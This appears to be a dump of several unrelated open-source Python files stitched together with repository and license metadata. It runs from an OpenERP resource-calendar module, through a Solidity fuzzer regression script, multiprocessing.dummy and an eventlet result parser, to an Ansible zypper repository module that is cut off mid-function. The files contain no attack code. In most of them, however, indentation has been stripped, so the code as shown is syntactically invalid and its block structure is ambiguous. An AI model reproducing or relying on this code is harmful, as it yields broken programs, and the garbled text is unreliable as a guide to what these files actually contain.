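    # calendar whose Monday attendance_ids cover 8:00-12:00 and 13:00-17:00,
    # calling working_hours_on_day() with a Monday datetime returns
    # (12 - 8) + (17 - 13) = 8.0; a day with no attendance lines returns 0.0.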
def _get_leaves(self, cr, uid, id, resource):
"""Private Method to Calculate resource Leaves days
@param id: resource calendar id
@param resource: resource id for which leaves will ew calculated
@return : returns the list of dates, where resource on leave in
resource.calendar.leaves object (e.g.['%Y-%m-%d', '%Y-%m-%d'])
"""
resource_cal_leaves = self.pool.get('resource.calendar.leaves')
dt_leave = []
resource_leave_ids = resource_cal_leaves.search(cr, uid, [('calendar_id','=',id), '|', ('resource_id','=',False), ('resource_id','=',resource)])
#res_leaves = resource_cal_leaves.read(cr, uid, resource_leave_ids, ['date_from', 'date_to'])
res_leaves = resource_cal_leaves.browse(cr, uid, resource_leave_ids)
for leave in res_leaves:
dtf = datetime.strptime(leave.date_from, '%Y-%m-%d %H:%M:%S')
dtt = datetime.strptime(leave.date_to, '%Y-%m-%d %H:%M:%S')
no = dtt - dtf
[dt_leave.append((dtf + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
dt_leave.sort()
return dt_leave
def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False):
"""
        Calculates the working schedule needed to fit the requested number of
        hours immediately before the supplied date, based on the resource
        calendar id. If a resource is given, its leaves are also taken into
        account.
        @param dt_from: datetime object at which the working schedule ends
                (hours are scheduled backwards from this point)
        @param hours: float, total number of working hours to schedule
        @param resource : optional resource id; if supplied, the resource's
                leaves are also taken into consideration when calculating the
                working schedule
        @return : list of (start, end) datetime tuples describing the working
                schedule based on the supplied parameters
"""
if not id:
td = int(hours)*3
return [(dt_from - timedelta(hours=td), dt_from)]
dt_leave = self._get_leaves(cr, uid, id, resource)
dt_leave.reverse()
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
while float_compare(todo, 0, 4) and maxrecur:
cr.execute("select hour_from,hour_to from resource_calendar_attendance where dayofweek='%s' and calendar_id=%s order by hour_from desc", (dt_from.weekday(),id))
for (hour_from,hour_to) in cr.fetchall():
leave_flag = False
if (hour_from<current_hour) and float_compare(todo, 0, 4):
m = min(hour_to, current_hour)
if (m-hour_from)>todo:
hour_from = m-todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(hour_from)), int((hour_from%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(m)), int((m%1) * 60))
result.append((d1, d2))
current_hour = hour_from
todo -= (m-hour_from)
dt_from -= timedelta(days=1)
current_hour = 24
maxrecur -= 1
result.reverse()
return result
# def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True):
def group(lst, key):
lst.sort(key=itemgetter(key))
grouped = groupby(lst, itemgetter(key))
return dict([(k, [v for v in itr]) for k, itr in grouped])
# END group
cr.execute("select calendar_id, dayofweek, hour_from, hour_to from resource_calendar_attendance order by hour_from")
hour_res = cr.dictfetchall()
hours_by_cal = group(hour_res, 'calendar_id')
results = {}
for d, hours, id in date_and_hours_by_cal:
dt_from = datetime.strptime(d, '%Y-%m-%d %H:%M:%S')
if not id:
td = int(hours)*3
results[(d, hours, id)] = [(dt_from, dt_from + timedelta(hours=td))]
continue
dt_leave = self._get_leaves(cr, uid, id, resource)
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
while float_compare(todo, 0, 4) and maxrecur:
for (hour_from,hour_to) in [(item['hour_from'], item['hour_to']) for item in hours_by_cal[id] if item['dayofweek'] == str(dt_from.weekday())]:
leave_flag = False
if (hour_to>current_hour) and float_compare(todo, 0, 4):
m = max(hour_from, current_hour)
if (hour_to-m)>todo:
hour_to = m+todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(m)), minutes=int((m%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(hour_to)), minutes=int((hour_to%1) * 60))
result.append((d1, d2))
current_hour = hour_to
todo -= (hour_to - m)
dt_from += timedelta(days=1)
current_hour = 0
maxrecur -= 1
results[(d, hours, id)] = result
return results
def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
"""Calculates Resource Working Internal Timing Based on Resource Calendar.
@param dt_from: start resource schedule calculation.
@param hours : total number of working hours to be scheduled.
@param resource: optional resource id, If supplied it will take care of
resource leave while scheduling.
@param byday: boolean flag bit enforce day wise scheduling
@return : list of scheduled working timing based on resource calendar.
"""
res = self.interval_get_multi(cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)]
return res
def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource: optional resource id, If given resource leave will be
considered.
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource)
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource_id: optional resource id, If given resource leave will be
considered.
@param timezone_from_uid: optional uid, if given we will considerer
working hours in that user timezone
@param exclude_leaves: optionnal, if set to True (default) we will exclude
resource leaves from working hours
@param context: current request context
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
utc_tz = pytz.timezone('UTC')
local_tz = utc_tz
if timezone_from_uid:
users_obj = self.pool.get('res.users')
user_timezone = users_obj.browse(cr, uid, timezone_from_uid, context=context).partner_id.tz
if user_timezone:
try:
local_tz = pytz.timezone(user_timezone)
except pytz.UnknownTimeZoneError:
pass # fallback to UTC as local timezone
def utc_to_local_zone(naive_datetime):
utc_dt = utc_tz.localize(naive_datetime, is_dst=False)
return utc_dt.astimezone(local_tz)
def float_time_convert(float_val):
factor = float_val < 0 and -1 or 1
val = abs(float_val)
return (factor * int(math.floor(val)), int(round((val % 1) * 60)))
# Get slots hours per day
# {day_of_week: [(8, 12), (13, 17), ...], ...}
hours_range_per_weekday = {}
if id:
cr.execute("select dayofweek, hour_from,hour_to from resource_calendar_attendance where calendar_id=%s order by hour_from", (id,))
for weekday, hour_from, hour_to in cr.fetchall():
weekday = int(weekday)
hours_range_per_weekday.setdefault(weekday, [])
hours_range_per_weekday[weekday].append((hour_from, hour_to))
else:
# considering default working hours (Monday -> Friday, 8 -> 12, 13 -> 17)
for weekday in range(5):
hours_range_per_weekday[weekday] = [(8, 12), (13, 17)]
## Interval between dt_from - dt_to
##
## dt_from dt_to
## =============|==================|============
## [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ]
##
## [ : start of range
## ] : end of range
##
## case 1: range end before interval start (skip)
## case 2: range overlap interval start (fit start to internal)
## case 3: range within interval
## case 4: range overlap interval end (fit end to interval)
## case 5: range start after interval end (skip)
interval_start = utc_to_local_zone(dt_from)
interval_end = utc_to_local_zone(dt_to)
hours_timedelta = timedelta()
# Get leaves for requested resource
dt_leaves = set([])
if exclude_leaves and id:
dt_leaves = set(self._get_leaves(cr, uid, id, resource=resource_id))
for day in rrule.rrule(rrule.DAILY, dtstart=interval_start,
until=interval_end+timedelta(days=1),
byweekday=hours_range_per_weekday.keys()):
if exclude_leaves and day.strftime('%Y-%m-%d') in dt_leaves:
                # XXX: further improve leave management to allow for partial day leave
continue
for (range_from, range_to) in hours_range_per_weekday.get(day.weekday(), []):
range_from_hour, range_from_min = float_time_convert(range_from)
range_to_hour, range_to_min = float_time_convert(range_to)
daytime_start = local_tz.localize(day.replace(hour=range_from_hour, minute=range_from_min, second=0, tzinfo=None))
daytime_end = local_tz.localize(day.replace(hour=range_to_hour, minute=range_to_min, second=0, tzinfo=None))
# case 1 & 5: time range out of interval
if daytime_end < interval_start or daytime_start > interval_end:
continue
# case 2 & 4: adjust start, end to fit within interval
daytime_start = max(daytime_start, interval_start)
daytime_end = min(daytime_end, interval_end)
# case 2+, 4+, 3
hours_timedelta += (daytime_end - daytime_start)
# return timedelta converted to hours
return (hours_timedelta.days * 24.0 + hours_timedelta.seconds / 3600.0)
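# Illustrative call sketch for interval_hours_get (not from the module; the ids
# and dates below are assumptions):
#   hours = calendar_obj.interval_hours_get(cr, uid, calendar_id,
#                                           datetime(2013, 1, 7, 8, 0),
#                                           datetime(2013, 1, 11, 17, 0),
#                                           resource=resource_id)
# returns the number of working hours between the two datetimes, skipping any
# leave days recorded for the calendar or for that resource.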
resource_calendar()
class resource_calendar_attendance(osv.osv):
_name = "resource.calendar.attendance"
_description = "Work Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True),
'date_from' : fields.date('Starting Date'),
'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True),
'hour_to' : fields.float("Work to", required=True),
'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True),
}
_order = 'dayofweek, hour_from'
_defaults = {
'dayofweek' : '0'
}
resource_calendar_attendance()
def hours_time_string(hours):
""" convert a number of hours (float) into a string with format '%H:%M' """
minutes = int(round(hours * 60))
return "%02d:%02d" % divmod(minutes, 60)
class resource_resource(osv.osv):
_name = "resource.resource"
_description = "Resource Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'code': fields.char('Code', size=16),
'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."),
'company_id' : fields.many2one('res.company', 'Company'),
'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True),
'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'),
'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depict the efficiency of the resource to complete tasks. e.g resource put alone on a phase of 5 days with 5 tasks assigned to him, will show a load of 100% for this phase by default, but if we put a efficiency of 200%, then his load will only be 50%."),
'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the schedule of resource"),
}
_defaults = {
'resource_type' : 'user',
'time_efficiency' : 1,
'active' : True,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if not default.get('name', False):
default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name))
return super(resource_resource, self).copy(cr, uid, id, default, context)
def generate_resources(self, cr, uid, user_ids, calendar_id, context=None):
"""
        Return a dictionary, keyed by user id, describing the resources (name, vacation, efficiency) allocated to the phase.
"""
resource_objs = {}
user_pool = self.pool.get('res.users')
for user in user_pool.browse(cr, uid, user_ids, context=context):
resource_objs[user.id] = {
'name' : user.name,
'vacation': [],
'efficiency': 1.0,
}
resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context)
if resource_ids:
for resource in self.browse(cr, uid, resource_ids, context=context):
resource_objs[user.id]['efficiency'] = resource.time_efficiency
resource_cal = resource.calendar_id.id
if resource_cal:
leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context)
resource_objs[user.id]['vacation'] += list(leaves)
return resource_objs
def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None):
"""
Compute the vacation from the working calendar of the resource.
@param calendar_id : working calendar of the project
@param resource_id : resource working on phase/task
@param resource_calendar : working calendar of the resource
"""
resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves')
leave_list = []
if resource_id:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id),
('calendar_id', '=', resource_calendar),
('resource_id', '=', resource_id)
], context=context)
else:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id),
('resource_id', '=', False)
], context=context)
leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context)
for i in range(len(leaves)):
dt_start = datetime.strptime(leaves[i]['date_from'], '%Y-%m-%d %H:%M:%S')
dt_end = datetime.strptime(leaves[i]['date_to'], '%Y-%m-%d %H:%M:%S')
no = dt_end - dt_start
[leave_list.append((dt_start + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
leave_list.sort()
return leave_list
def compute_working_calendar(self, cr, uid, calendar_id=False, context=None):
"""
        Convert the working calendar from the OpenERP format into the format expected by the 'Faces' library.
@param calendar_id : working calendar of the project
"""
if not calendar_id:
            # Calendar is not specified: fall back to a default Monday-Friday,
            # 8:00-12:00 / 13:00-17:00 working time
return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'),
('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')]
resource_attendance_pool = self.pool.get('resource.calendar.attendance')
time_range = "8:00-8:00"
non_working = ""
week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"}
wk_days = {}
wk_time = {}
wktime_list = []
wktime_cal = []
week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context)
weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context)
# Convert time formats into appropriate format required
# and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')]
for week in weeks:
res_str = ""
day = None
if week_days.get(week['dayofweek'],False):
day = week_days[week['dayofweek']]
wk_days[week['dayofweek']] = week_days[week['dayofweek']]
else:
raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!'))
hour_from_str = hours_time_string(week['hour_from'])
hour_to_str = hours_time_string(week['hour_to'])
res_str = hour_from_str + '-' + hour_to_str
wktime_list.append((day, res_str))
# Convert into format like [('mon', '8:00-12:00', '13:00-18:00')]
for item in wktime_list:
if wk_time.has_key(item[0]):
wk_time[item[0]].append(item[1])
else:
wk_time[item[0]] = [item[0]]
wk_time[item[0]].append(item[1])
for k,v in wk_time.items():
wktime_cal.append(tuple(v))
# Add for the non-working days like: [('sat, sun', '8:00-8:00')]
for k, v in wk_days.items():
if week_days.has_key(k):
week_days.pop(k)
for v in week_days.itervalues():
non_working += v + ','
if non_working:
wktime_cal.append((non_working[:-1], time_range))
return wktime_cal
resource_resource()
class resource_calendar_leaves(osv.osv):
_name = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'name' : fields.char("Name", size=64),
'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True),
'calendar_id' : fields.many2one("resource.calendar", "Working Time"),
'date_from' : fields.datetime('Start Date', required=True),
'date_to' : fields.datetime('End Date', required=True),
'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"),
}
def check_dates(self, cr, uid, ids, context=None):
leave = self.read(cr, uid, ids[0], ['date_from', 'date_to'])
if leave['date_from'] and leave['date_to']:
if leave['date_from'] > leave['date_to']:
return False
return True
_constraints = [
        (check_dates, 'Error! leave start-date must be lower than leave end-date.', ['date_from', 'date_to'])
]
def onchange_resource(self, cr, uid, ids, resource, context=None):
result = {}
if resource:
resource_pool = self.pool.get('resource.resource')
result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id
return {'value': result}
return {'value': {'calendar_id': []}}
resource_calendar_leaves()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ethereum/solidity | scripts/regressions.py | 1 | 4285 | #!/usr/bin/env python3
from argparse import ArgumentParser
import sys
import os
import subprocess
import re
import glob
import threading
import time
DESCRIPTION = """Regressor is a tool to run regression tests in a CI env."""
class PrintDotsThread(object):
"""Prints a dot every "interval" (default is 300) seconds"""
def __init__(self, interval=300):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
""" Runs until the main Python thread exits. """
## Print a newline at the very beginning.
print("")
while True:
# Print dot
print(".")
time.sleep(self.interval)
class regressor():
_re_sanitizer_log = re.compile(r"""ERROR: (libFuzzer|UndefinedBehaviorSanitizer)""")
def __init__(self, description, args):
self._description = description
self._args = self.parseCmdLine(description, args)
self._repo_root = os.path.dirname(sys.path[0])
self._fuzzer_path = os.path.join(self._repo_root,
"build/test/tools/ossfuzz")
self._logpath = os.path.join(self._repo_root, "test_results")
def parseCmdLine(self, description, args):
argParser = ArgumentParser(description)
argParser.add_argument('-o', '--out-dir', required=True, type=str,
help="""Directory where test results will be written""")
return argParser.parse_args(args)
@staticmethod
def run_cmd(command, logfile=None, env=None):
"""
Args:
command (str): command to run
logfile (str): log file name
env (dict): dictionary holding key-value pairs for bash environment
variables
Returns:
int: The exit status of the command. Exit status codes are:
0 -> Success
1-255 -> Failure
"""
if not logfile:
logfile = os.devnull
if not env:
env = os.environ.copy()
with open(logfile, 'w') as logfh:
with subprocess.Popen(command, shell=True, executable='/bin/bash',
env=env, stdout=logfh,
stderr=subprocess.STDOUT) as proc:
ret = proc.wait()
logfh.close()
return ret
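    # Illustrative usage sketch (the command and file names are assumptions,
    # not part of the original script):
    #   status = regressor.run_cmd("./myfuzzer_ossfuzz seed-file", logfile="run.log")
    #   passed = (status == 0)
    # The command is run through /bin/bash, stdout and stderr both go to the
    # log file, and the shell exit status is returned.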
def process_log(self, logfile):
"""
Args:
logfile (str): log file name
Returns:
bool: Test status.
True -> Success
False -> Failure
"""
## Log may contain non ASCII characters, so we simply stringify them
## since they don't matter for regular expression matching
with open(logfile, 'rb') as f:
rawtext = str(f.read())
return not re.search(self._re_sanitizer_log, rawtext)
def run(self):
"""
Returns:
bool: Test status.
True -> All tests succeeded
False -> At least one test failed
"""
testStatus = []
for fuzzer in glob.iglob("{}/*_ossfuzz".format(self._fuzzer_path)):
basename = os.path.basename(fuzzer)
logfile = os.path.join(self._logpath, "{}.log".format(basename))
corpus_dir = "/tmp/solidity-fuzzing-corpus/{0}_seed_corpus" \
.format(basename)
cmd = "find {0} -type f | xargs -n1 sh -c '{1} $0 || exit 255'".format(corpus_dir, fuzzer)
self.run_cmd(cmd, logfile=logfile)
ret = self.process_log(logfile)
if not ret:
print(
"\t[-] libFuzzer reported failure for {0}. "
"Failure logged to test_results".format(
basename))
testStatus.append(False)
else:
print("\t[+] {0} passed regression tests.".format(basename))
testStatus.append(True)
return all(testStatus)
if __name__ == '__main__':
dotprinter = PrintDotsThread()
tool = regressor(DESCRIPTION, sys.argv[1:])
sys.exit(not tool.run())
| gpl-3.0 |
zhjunlang/kbengine | kbe/src/lib/python/Lib/multiprocessing/dummy/__init__.py | 79 | 2881 | #
# Support for the API of the multiprocessing package using threads
#
# multiprocessing/dummy/__init__.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [
'Process', 'current_process', 'active_children', 'freeze_support',
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition',
'Event', 'Barrier', 'Queue', 'Manager', 'Pipe', 'Pool', 'JoinableQueue'
]
#
# Imports
#
import threading
import sys
import weakref
import array
from .connection import Pipe
from threading import Lock, RLock, Semaphore, BoundedSemaphore
from threading import Event, Condition, Barrier
from queue import Queue
#
#
#
class DummyProcess(threading.Thread):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
threading.Thread.__init__(self, group, target, name, args, kwargs)
self._pid = None
self._children = weakref.WeakKeyDictionary()
self._start_called = False
self._parent = current_process()
def start(self):
assert self._parent is current_process()
self._start_called = True
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
threading.Thread.start(self)
@property
def exitcode(self):
if self._start_called and not self.is_alive():
return 0
else:
return None
#
#
#
Process = DummyProcess
current_process = threading.current_thread
current_process()._children = weakref.WeakKeyDictionary()
def active_children():
children = current_process()._children
for p in list(children):
if not p.is_alive():
children.pop(p, None)
return list(children)
def freeze_support():
pass
#
#
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
dict = dict
list = list
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def _get(self):
return self._value
def _set(self, value):
self._value = value
value = property(_get, _set)
def __repr__(self):
return '<%s(%r, %r)>'%(type(self).__name__,self._typecode,self._value)
def Manager():
return sys.modules[__name__]
def shutdown():
pass
def Pool(processes=None, initializer=None, initargs=()):
from ..pool import ThreadPool
return ThreadPool(processes, initializer, initargs)
JoinableQueue = Queue
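# Illustrative usage sketch (not part of the stdlib source): the dummy package
# exposes the multiprocessing API on top of threads, so Pool() here is really
# a ThreadPool.
#   from multiprocessing import dummy
#   pool = dummy.Pool(4)
#   results = pool.map(str.upper, ['a', 'b', 'c'])   # -> ['A', 'B', 'C']
#   pool.close(); pool.join()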
| lgpl-3.0 |
2013Commons/HUE-SHARK | desktop/core/ext-py/eventlet-0.9.14/tests/parse_results.py | 7 | 3671 | import sys
import os
import traceback
try:
import sqlite3
except ImportError:
import pysqlite2.dbapi2 as sqlite3
import re
import glob
def parse_stdout(s):
argv = re.search('^===ARGV=(.*?)$', s, re.M).group(1)
argv = argv.split()
testname = argv[-1]
del argv[-1]
hub = None
reactor = None
while argv:
if argv[0]=='--hub':
hub = argv[1]
del argv[0]
del argv[0]
elif argv[0]=='--reactor':
reactor = argv[1]
del argv[0]
del argv[0]
else:
del argv[0]
if reactor is not None:
hub += '/%s' % reactor
return testname, hub
unittest_delim = '----------------------------------------------------------------------'
def parse_unittest_output(s):
s = s[s.rindex(unittest_delim)+len(unittest_delim):]
num = int(re.search('^Ran (\d+) test.*?$', s, re.M).group(1))
ok = re.search('^OK$', s, re.M)
error, fail, timeout = 0, 0, 0
failed_match = re.search(r'^FAILED \((?:failures=(?P<f>\d+))?,? ?(?:errors=(?P<e>\d+))?\)$', s, re.M)
ok_match = re.search('^OK$', s, re.M)
if failed_match:
assert not ok_match, (ok_match, s)
fail = failed_match.group('f')
error = failed_match.group('e')
fail = int(fail or '0')
error = int(error or '0')
else:
assert ok_match, repr(s)
timeout_match = re.search('^===disabled because of timeout: (\d+)$', s, re.M)
if timeout_match:
timeout = int(timeout_match.group(1))
return num, error, fail, timeout
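# Example (illustrative): for output ending in the standard unittest footer
# (after the dashed separator line) such as
#   Ran 12 tests in 0.5s
#   FAILED (failures=1, errors=2)
# parse_unittest_output() returns (12, 2, 1, 0); with a plain "OK" footer it
# returns (12, 0, 0, 0).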
def main(db):
c = sqlite3.connect(db)
c.execute('''create table if not exists parsed_command_record
(id integer not null unique,
testname text,
hub text,
runs integer,
errors integer,
fails integer,
timeouts integer,
error_names text,
fail_names text,
timeout_names text)''')
c.commit()
parse_error = 0
SQL = ('select command_record.id, command, stdout, exitcode from command_record '
'where not exists (select * from parsed_command_record where '
'parsed_command_record.id=command_record.id)')
for row in c.execute(SQL).fetchall():
id, command, stdout, exitcode = row
try:
testname, hub = parse_stdout(stdout)
if unittest_delim in stdout:
runs, errors, fails, timeouts = parse_unittest_output(stdout)
else:
if exitcode == 0:
runs, errors, fails, timeouts = 1,0,0,0
if exitcode == 7:
runs, errors, fails, timeouts = 0,0,0,1
elif exitcode:
runs, errors, fails, timeouts = 1,1,0,0
except Exception:
parse_error += 1
sys.stderr.write('Failed to parse id=%s\n' % id)
print repr(stdout)
traceback.print_exc()
else:
print id, hub, testname, runs, errors, fails, timeouts
c.execute('insert into parsed_command_record '
'(id, testname, hub, runs, errors, fails, timeouts) '
'values (?, ?, ?, ?, ?, ?, ?)',
(id, testname, hub, runs, errors, fails, timeouts))
c.commit()
if __name__=='__main__':
if not sys.argv[1:]:
latest_db = sorted(glob.glob('results.*.db'), key=lambda f: os.stat(f).st_mtime)[-1]
print latest_db
sys.argv.append(latest_db)
for db in sys.argv[1:]:
main(db)
execfile('generate_report.py')
| apache-2.0 |
perzizzle/ansible-modules-extras | packaging/os/zypper_repository.py | 22 | 8763 | #!/usr/bin/python
# encoding: utf-8
# (c) 2013, Matthias Vogelgesang <[email protected]>
# (c) 2014, Justin Lecher <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: zypper_repository
author: "Matthias Vogelgesang (@matze)"
version_added: "1.4"
short_description: Add and remove Zypper repositories
description:
- Add or remove Zypper repositories on SUSE and openSUSE
options:
name:
required: false
default: none
description:
- A name for the repository. Not required when adding repofiles.
repo:
required: false
default: none
description:
- URI of the repository or .repo file. Required when state=present.
state:
required: false
choices: [ "absent", "present" ]
default: "present"
description:
        - Whether the repository should be present or absent.
description:
required: false
default: none
description:
- A description of the repository
disable_gpg_check:
description:
- Whether to disable GPG signature checking of
all packages. Has an effect only if state is
I(present).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
refresh:
description:
- Enable autorefresh of the repository.
required: false
default: "yes"
choices: [ "yes", "no" ]
aliases: []
notes: []
requirements: [ zypper ]
'''
EXAMPLES = '''
# Add NVIDIA repository for graphics drivers
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=present
# Remove NVIDIA repository
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=absent
# Add python development repository
- zypper_repository: repo=http://download.opensuse.org/repositories/devel:/languages:/python/SLE_11_SP3/devel:languages:python.repo
'''
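# Additional illustrative example (a sketch, not part of the module's documented
# EXAMPLES): when state=absent, a repository can also be removed by alias alone.
#   - zypper_repository: name=nvidia-repo state=absent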
REPO_OPTS = ['alias', 'name', 'priority', 'enabled', 'autorefresh', 'gpgcheck']
def zypper_version(module):
"""Return (rc, message) tuple"""
cmd = ['/usr/bin/zypper', '-V']
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
if rc == 0:
return rc, stdout
else:
return rc, stderr
def _parse_repos(module):
"""parses the output of zypper -x lr and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', '-x', 'lr']
repos = []
from xml.dom.minidom import parseString as parseXML
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
dom = parseXML(stdout)
repo_list = dom.getElementsByTagName('repo')
for repo in repo_list:
opts = {}
for o in REPO_OPTS:
opts[o] = repo.getAttribute(o)
opts['url'] = repo.getElementsByTagName('url')[0].firstChild.data
# A repo can be uniquely identified by an alias + url
repos.append(opts)
return repos
def _parse_repos_old(module):
"""parses the output of zypper sl and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', 'sl']
repos = []
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
for line in stdout.split('\n'):
matched = re.search(r'\d+\s+\|\s+(?P<enabled>\w+)\s+\|\s+(?P<autorefresh>\w+)\s+\|\s+(?P<type>\w+)\s+\|\s+(?P<name>\w+)\s+\|\s+(?P<url>.*)', line)
if matched == None:
continue
m = matched.groupdict()
m['alias']= m['name']
m['priority'] = 100
m['gpgcheck'] = 1
repos.append(m)
return repos
def repo_exists(module, old_zypper, **kwargs):
def repo_subset(realrepo, repocmp):
for k in repocmp:
if k not in realrepo:
return False
for k, v in realrepo.items():
if k in repocmp:
if v.rstrip("/") != repocmp[k].rstrip("/"):
return False
return True
if old_zypper:
repos = _parse_repos_old(module)
else:
repos = _parse_repos(module)
for repo in repos:
if repo_subset(repo, kwargs):
return True
return False
def add_repo(module, repo, alias, description, disable_gpg_check, old_zypper, refresh):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sa']
else:
cmd = ['/usr/bin/zypper', 'ar', '--check']
if repo.startswith("file:/") and old_zypper:
cmd.extend(['-t', 'Plaindir'])
else:
cmd.extend(['-t', 'plaindir'])
if description:
cmd.extend(['--name', description])
if disable_gpg_check and not old_zypper:
cmd.append('--no-gpgcheck')
if refresh:
cmd.append('--refresh')
cmd.append(repo)
if not repo.endswith('.repo'):
cmd.append(alias)
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
changed = rc == 0
if rc == 0:
changed = True
elif 'already exists. Please use another alias' in stderr:
changed = False
else:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
return changed
def remove_repo(module, repo, alias, old_zypper):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sd']
else:
cmd = ['/usr/bin/zypper', 'rr']
if alias:
cmd.append(alias)
else:
cmd.append(repo)
